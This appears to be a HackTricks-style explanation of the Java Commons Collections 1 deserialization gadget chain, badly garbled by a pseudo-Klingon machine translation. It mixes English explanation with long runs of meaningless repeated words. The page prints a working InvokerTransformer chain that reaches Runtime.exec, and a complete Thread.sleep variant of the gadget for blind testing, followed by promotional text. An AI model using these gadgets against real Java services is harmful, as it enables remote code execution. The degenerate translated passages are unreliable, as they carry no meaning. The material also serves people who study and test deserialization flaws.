vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej v

Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");

Klingon Translation:

payload-Da jImej Map chelwI' jatlhlaH. SoH decorate DaH LazyMap-Daq jImej chelwI' je. code-Daq vItlhutlh chained transformers lazyMap.factory-Daq nIvbogh-lu'be'lu'chugh jImej chelwI' je.

Markdown Translation:

In the last section of the payload you can see that a Map object is created. Then, the function decorate is executed from LazyMap with the map object and the chained transformers. From the following code you can see that this will cause the chained transformers to be copied inside lazyMap.factory attribute.

protected LazyMap(Map map, Transformer factory) {
super(map);
if (factory == null) {
throw new IllegalArgumentException("Factory must not be null");
}
this.factory = factory;
}

jeH lazymap.get("pagh");

public Object get(Object key) {
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}

'ej vaj code 'oH transform DaH

public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) {
object = iTransformers[i].transform(object);
}
return object;
}

So, remember that inside factory we had saved chainedTransformer and inside of the transform function we are going through all those transformers chained and executing one after another. The funny thing, is that each transformer is using object as input and object is the output from the last transformer executed. Therefore, all the transforms are chained executing the malicious payload.

Summary

At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:

Klingon Translation

So, factory vItlhutlh chainedTransformer jatlh 'e' transform ghaH transformers chained ghaH 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej **

Object value = "someting";

value = new ConstantTransformer(Runtime.class).transform(value); //(1)

value = new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", null}
).transform(value); //(2)

value = new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
).transform(value); //(3)

value = new InvokerTransformer("exec",
new Class[]{String.class},
command
).transform(value); //(4)

Note how value is the input of each transform and the output of the previous transform, allowing the execution of a one-liner:

_Notev pagh value vItlhutlh vay' vItlhutlh transform'e' 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh 'ej vItlhutlh transform'e' vItlhutlh, 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh,

((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});

Qapla'! Qatlh gadgets vItlhutlh ComonsCollections1 payload jatlh. 'ach ghaH 'e' vItlhutlh 'ej ghaH vItlhutlh. [ysoserial vItlhutlh** 'e'** (https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), payload vItlhutlh** 'e'** 'ej 'e' vItlhutlh AnnotationInvocationHandler 'oH 'e' vItlhutlh, 'oH 'e' vItlhutlh deserialized 'e' 'e' payload.get() vItlhutlh 'e' 'e'.

Java Thread Sleep

web vulnerable 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' **'

import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1Sleep {
public static void main(String... args) {
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Thread.class),
new InvokerTransformer("getMethod",
new Class[]{
String.class, Class[].class
},
new Object[]{
"sleep", new Class[]{Long.TYPE}
}),
new InvokerTransformer("invoke",
new Class[]{
Object.class, Object[].class
}, new Object[]
{
null, new Object[] {7000L}
}),
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);

//Execute gadgets
lazyMap.get("anything");

}
}

nIvbogh Gadgets

nIvbogh gadgets vItlhutlh: https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html

htARTE (HackTricks AWS Red Team Expert) DaH jImej!

DaH jImej 'oH cybersecurity company? HackTricks vItlhutlh company advertised vay' company? 'ej latest version PEASS download HackTricks PDF? SUBSCRIPTION PLANS check!
The PEASS Family Discover, exclusive NFTs The PEASS Family collection.
official PEASS & HackTricks swag Get
Join 💬 Discord group telegram group follow Twitter 🐦@carlospolopm.
